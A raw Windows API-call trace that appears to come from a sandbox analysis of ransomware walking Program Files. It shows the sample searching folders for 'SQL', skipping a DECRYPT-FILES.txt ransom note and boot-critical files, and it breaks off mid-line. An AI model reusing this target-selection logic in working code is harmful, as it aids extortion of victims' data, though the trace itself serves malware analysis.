[0179.723] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x886a52d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x886a52d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0179.723] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0179.723] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0179.723] lstrcatW (in: lpString1="Adobe", lpString2="\\" | out: lpString1="Adobe\\") returned="Adobe\\" [0179.723] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Adobe\\" | out: lpString1="C:\\Program Files (x86)\\Adobe\\") returned="C:\\Program Files (x86)\\Adobe\\" [0179.723] StrStrW (lpFirst="C:\\Program Files (x86)\\Adobe\\", lpSrch="SQL") returned 0x0 [0179.723] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbdc44680, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0xbdc44680, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0179.723] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0179.723] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0179.723] lstrcatW (in: lpString1="Common Files", lpString2="\\" | out: lpString1="Common Files\\") returned="Common Files\\" [0179.723] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Common Files\\" | out: lpString1="C:\\Program Files (x86)\\Common Files\\") returned="C:\\Program Files (x86)\\Common Files\\" [0179.723] StrStrW (lpFirst="C:\\Program Files (x86)\\Common Files\\", lpSrch="SQL") returned 0x0 [0179.724] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6cb4540, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cb4540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cb4540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.724] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.724] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0179.724] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0179.724] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0179.724] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0179.724] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0179.724] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa547efa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xa547efa0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0179.724] lstrcmpW (lpString1="Google", lpString2=".") returned 1 [0179.724] lstrcmpW (lpString1="Google", lpString2="..") returned 1 [0179.724] lstrcatW (in: lpString1="Google", lpString2="\\" | out: lpString1="Google\\") returned="Google\\" [0179.724] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Google\\" | out: lpString1="C:\\Program Files (x86)\\Google\\") returned="C:\\Program Files (x86)\\Google\\" [0179.724] StrStrW (lpFirst="C:\\Program Files (x86)\\Google\\", lpSrch="SQL") returned 0x0 [0179.724] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0179.724] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0179.724] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0179.724] lstrcatW (in: lpString1="Internet Explorer", lpString2="\\" | out: lpString1="Internet Explorer\\") returned="Internet Explorer\\" [0179.724] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Internet Explorer\\" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\") returned="C:\\Program Files (x86)\\Internet Explorer\\" [0179.724] StrStrW (lpFirst="C:\\Program Files (x86)\\Internet Explorer\\", lpSrch="SQL") returned 0x0 [0179.724] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x734f7d60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x734f7d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0179.724] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0179.724] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0179.724] lstrcatW (in: lpString1="Java", lpString2="\\" | out: lpString1="Java\\") returned="Java\\" [0179.724] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Java\\" | out: lpString1="C:\\Program Files (x86)\\Java\\") returned="C:\\Program Files (x86)\\Java\\" [0179.724] StrStrW (lpFirst="C:\\Program Files (x86)\\Java\\", lpSrch="SQL") returned 0x0 [0179.724] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0179.724] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0179.724] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0179.724] lstrcatW (in: lpString1="Microsoft Analysis Services", lpString2="\\" | out: lpString1="Microsoft Analysis Services\\") returned="Microsoft Analysis Services\\" [0179.724] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft Analysis Services\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft Analysis Services\\") returned="C:\\Program Files (x86)\\Microsoft Analysis Services\\" [0179.724] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft Analysis Services\\", lpSrch="SQL") returned 0x0 [0179.724] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0179.724] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0179.725] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0179.725] lstrcatW (in: lpString1="Microsoft Office", lpString2="\\" | out: lpString1="Microsoft Office\\") returned="Microsoft Office\\" [0179.725] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft Office\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft Office\\") returned="C:\\Program Files (x86)\\Microsoft Office\\" [0179.725] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft Office\\", lpSrch="SQL") returned 0x0 [0179.725] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x10f11a30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1120b5b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1120b5b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Visual Studio 8", cAlternateFileName="MICROS~3")) returned 1 [0179.725] lstrcmpW (lpString1="Microsoft Visual Studio 8", lpString2=".") returned 1 [0179.725] lstrcmpW (lpString1="Microsoft Visual Studio 8", lpString2="..") returned 1 [0179.725] lstrcatW (in: lpString1="Microsoft Visual Studio 8", lpString2="\\" | out: lpString1="Microsoft Visual Studio 8\\") returned="Microsoft Visual Studio 8\\" [0179.725] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft Visual Studio 8\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\" [0179.725] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\", lpSrch="SQL") returned 0x0 [0179.725] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0179.725] lstrcmpW (lpString1="Microsoft.NET", lpString2=".") returned 1 [0179.725] lstrcmpW (lpString1="Microsoft.NET", lpString2="..") returned 1 [0179.725] lstrcatW (in: lpString1="Microsoft.NET", lpString2="\\" | out: lpString1="Microsoft.NET\\") returned="Microsoft.NET\\" [0179.725] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft.NET\\" | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET\\") returned="C:\\Program Files (x86)\\Microsoft.NET\\" [0179.725] StrStrW (lpFirst="C:\\Program Files (x86)\\Microsoft.NET\\", lpSrch="SQL") returned 0x0 [0179.725] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0179.725] lstrcmpW (lpString1="Mozilla Firefox", lpString2=".") returned 1 [0179.725] lstrcmpW (lpString1="Mozilla Firefox", lpString2="..") returned 1 [0179.725] lstrcatW (in: lpString1="Mozilla Firefox", lpString2="\\" | out: lpString1="Mozilla Firefox\\") returned="Mozilla Firefox\\" [0179.725] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Firefox\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\") returned="C:\\Program Files (x86)\\Mozilla Firefox\\" [0179.725] StrStrW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\", lpSrch="SQL") returned 0x0 [0179.725] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0179.725] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2=".") returned 1 [0179.725] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2="..") returned 1 [0179.725] lstrcatW (in: lpString1="Mozilla Maintenance Service", lpString2="\\" | out: lpString1="Mozilla Maintenance Service\\") returned="Mozilla Maintenance Service\\" [0179.725] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Maintenance Service\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service\\" [0179.725] StrStrW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpSrch="SQL") returned 0x0 [0179.725] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8822e990, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8822e990, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0179.725] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0179.725] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0179.725] lstrcatW (in: lpString1="MSBuild", lpString2="\\" | out: lpString1="MSBuild\\") returned="MSBuild\\" [0179.725] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="MSBuild\\" | out: lpString1="C:\\Program Files (x86)\\MSBuild\\") returned="C:\\Program Files (x86)\\MSBuild\\" [0179.725] StrStrW (lpFirst="C:\\Program Files (x86)\\MSBuild\\", lpSrch="SQL") returned 0x0 [0179.726] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0179.726] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0179.726] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0179.726] lstrcatW (in: lpString1="Reference Assemblies", lpString2="\\" | out: lpString1="Reference Assemblies\\") returned="Reference Assemblies\\" [0179.726] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Reference Assemblies\\" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\") returned="C:\\Program Files (x86)\\Reference Assemblies\\" [0179.726] StrStrW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\", lpSrch="SQL") returned 0x0 [0179.726] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8907f814, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8907f814, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0179.726] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0179.726] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0179.726] lstrcatW (in: lpString1="Uninstall Information", lpString2="\\" | out: lpString1="Uninstall Information\\") returned="Uninstall Information\\" [0179.726] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Uninstall Information\\" | out: lpString1="C:\\Program Files (x86)\\Uninstall Information\\") returned="C:\\Program Files (x86)\\Uninstall Information\\" [0179.726] StrStrW (lpFirst="C:\\Program Files (x86)\\Uninstall Information\\", lpSrch="SQL") returned 0x0 [0179.726] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88208830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88208830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0179.726] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0179.726] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0179.726] lstrcatW (in: lpString1="Windows Defender", lpString2="\\" | out: lpString1="Windows Defender\\") returned="Windows Defender\\" [0179.726] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Defender\\" | out: lpString1="C:\\Program Files (x86)\\Windows Defender\\") returned="C:\\Program Files (x86)\\Windows Defender\\" [0179.726] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\", lpSrch="SQL") returned 0x0 [0179.726] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0179.726] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0179.726] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0179.726] lstrcatW (in: lpString1="Windows Mail", lpString2="\\" | out: lpString1="Windows Mail\\") returned="Windows Mail\\" [0179.726] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Mail\\" | out: lpString1="C:\\Program Files (x86)\\Windows Mail\\") returned="C:\\Program Files (x86)\\Windows Mail\\" [0179.726] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\", lpSrch="SQL") returned 0x0 [0179.726] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0179.726] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0179.726] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0179.726] lstrcatW (in: lpString1="Windows Media Player", lpString2="\\" | out: lpString1="Windows Media Player\\") returned="Windows Media Player\\" [0179.726] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Media Player\\" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\") returned="C:\\Program Files (x86)\\Windows Media Player\\" [0179.726] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\", lpSrch="SQL") returned 0x0 [0179.726] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0179.726] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0179.726] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0179.726] lstrcatW (in: lpString1="Windows NT", lpString2="\\" | out: lpString1="Windows NT\\") returned="Windows NT\\" [0179.726] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows NT\\" | out: lpString1="C:\\Program Files (x86)\\Windows NT\\") returned="C:\\Program Files (x86)\\Windows NT\\" [0179.727] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows NT\\", lpSrch="SQL") returned 0x0 [0179.727] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0179.727] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0179.727] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0179.727] lstrcatW (in: lpString1="Windows Photo Viewer", lpString2="\\" | out: lpString1="Windows Photo Viewer\\") returned="Windows Photo Viewer\\" [0179.727] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Photo Viewer\\" | out: lpString1="C:\\Program Files (x86)\\Windows Photo Viewer\\") returned="C:\\Program Files (x86)\\Windows Photo Viewer\\" [0179.727] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\", lpSrch="SQL") returned 0x0 [0179.727] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88208830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88208830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0179.727] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0179.727] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0179.727] lstrcatW (in: lpString1="Windows Portable Devices", lpString2="\\" | out: lpString1="Windows Portable Devices\\") returned="Windows Portable Devices\\" [0179.727] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Portable Devices\\" | out: lpString1="C:\\Program Files (x86)\\Windows Portable Devices\\") returned="C:\\Program Files (x86)\\Windows Portable Devices\\" [0179.727] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Portable Devices\\", lpSrch="SQL") returned 0x0 [0179.727] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0179.727] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0179.727] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0179.727] lstrcatW (in: lpString1="Windows Sidebar", lpString2="\\" | out: lpString1="Windows Sidebar\\") returned="Windows Sidebar\\" [0179.727] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Sidebar\\" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\") returned="C:\\Program Files (x86)\\Windows Sidebar\\" [0179.727] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\", lpSrch="SQL") returned 0x0 [0179.727] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar\\", cAlternateFileName="WI4223~1")) returned 0 [0179.727] FindClose (in: hFindFile=0x479738 | out: hFindFile=0x479738) returned 1 [0179.727] CloseHandle (hObject=0xffffffff) returned 0 [0179.727] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9b32f2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x9b32f2a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0179.727] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0179.727] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0179.727] lstrcatW (in: lpString1="ProgramData", lpString2="\\" | out: 